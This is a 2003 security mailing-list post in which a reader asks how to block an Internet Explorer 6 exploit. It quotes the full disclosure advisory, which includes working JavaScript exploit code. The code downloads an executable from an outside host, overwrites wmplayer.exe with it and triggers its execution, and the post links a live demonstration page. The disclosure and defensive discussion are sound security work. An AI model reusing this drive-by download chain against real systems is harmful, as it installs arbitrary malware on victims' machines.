Do you have any suggestions of feature(s) that can be turned off in Windows or Internet Explorer that will prevent this exploit for working? I'm mostly interested in some feature that wouldn't typically be used on a Web page. It's also not necessary for there to be a UI to turn a feature on or off. A hidden registry setting is fine.
Also, Internet Explorer has an option for turning off sounds in Web pages. If sounds are turned off in IE, will this exploit still work? Thanks, Richard -----Original Message----- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of jelmer Sent: Thursday, September 11, 2003 6:32 PM To: [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Subject: [Full-Disclosure] Internet explorer 6 on windows XP allows exection of arbitrary code Internet explorer 6 on windows XP allows exection of arbitrary code DESCRIPTION : Yesterday Liu Die Yu released a number series of advisories concerning internet explorer by combining on of these issues with an earlier issue I myself reported a while back You can construct a specially crafted webpage that can take any action on a users system including but not limited to, installing trojans, keyloggers, wiping the users harddrive etc. TECHNICAL EXPLAINATION : Internet explorer 6 comes with a media sidebar in wich you can load and play mediaclips without even leaving the browser. when you instruct the mediabar to load a file from an unknown host or the HTTP status returned by an existing host indicates an error this media bar displays an error page inside the media bar namely res://C:\WINDOWS\System32\browselc.dll/mb404.htm#path res URL's are treated as being in the "my computer zone" and are loaded from the users filesystem perfect conditions for the issue I describe on http://www.mail-archive.com/[EMAIL PROTECTED]/msg06791.ht ml To work. now all that is needed is a way to inject this exploit code into this page This method was graciously provided by Liu Die Yu as you can read on http://www.securityfocus.com/archive/1/336937/2003-09-08/2003-09-14/0 Combining these issues we get something like : --snip-- <textarea id="code" style="display:none;"> var x = new ActiveXObject("Microsoft.XMLHTTP"); x.Open("GET", "http://ip3e83566f.speed.planet.nl/1.exe",0); x.Send(); var s = new ActiveXObject("ADODB.Stream"); s.Mode = 3; s.Type = 1; s.Open(); s.Write(x.responseBody); s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2); location.href = "mms://"; </textarea> <script language="javascript"> function preparecode(code) { result = ''; lines = code.split(/\r\n/); for (i=0;i<lines.length;i++) { line = lines[i]; line = line.replace(/^\s+/,""); line = line.replace(/\s+$/,""); line = line.replace(/'/g,"\\'"); line = line.replace(/[\\]/g,"\\\\"); line = line.replace(/[/]/g,"%2f"); if (line != '') { result += line +'\\r\\n'; } } return result; } function doit() { mycode = preparecode(document.all.code.value); myURL = "file:javascript:eval('" + mycode + "')"; window.open(myURL,"_media") } window.open("error.jsp","_media"); setTimeout("doit()", 5000); </script> --snip-- error.jsp is a jsp page that consists of one line, namely <% response.setStatus(HttpServletResponse.SC_UNAUTHORIZED); %> DEMONSTRATION : A demonstration is provided at : http://ip3e83566f.speed.planet.nl/hacked-by-chinese/5.htm WORKAROUND : Disable active scripting or do "the sensible thing" and pick another browser such as the excellent mozilla firebird. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
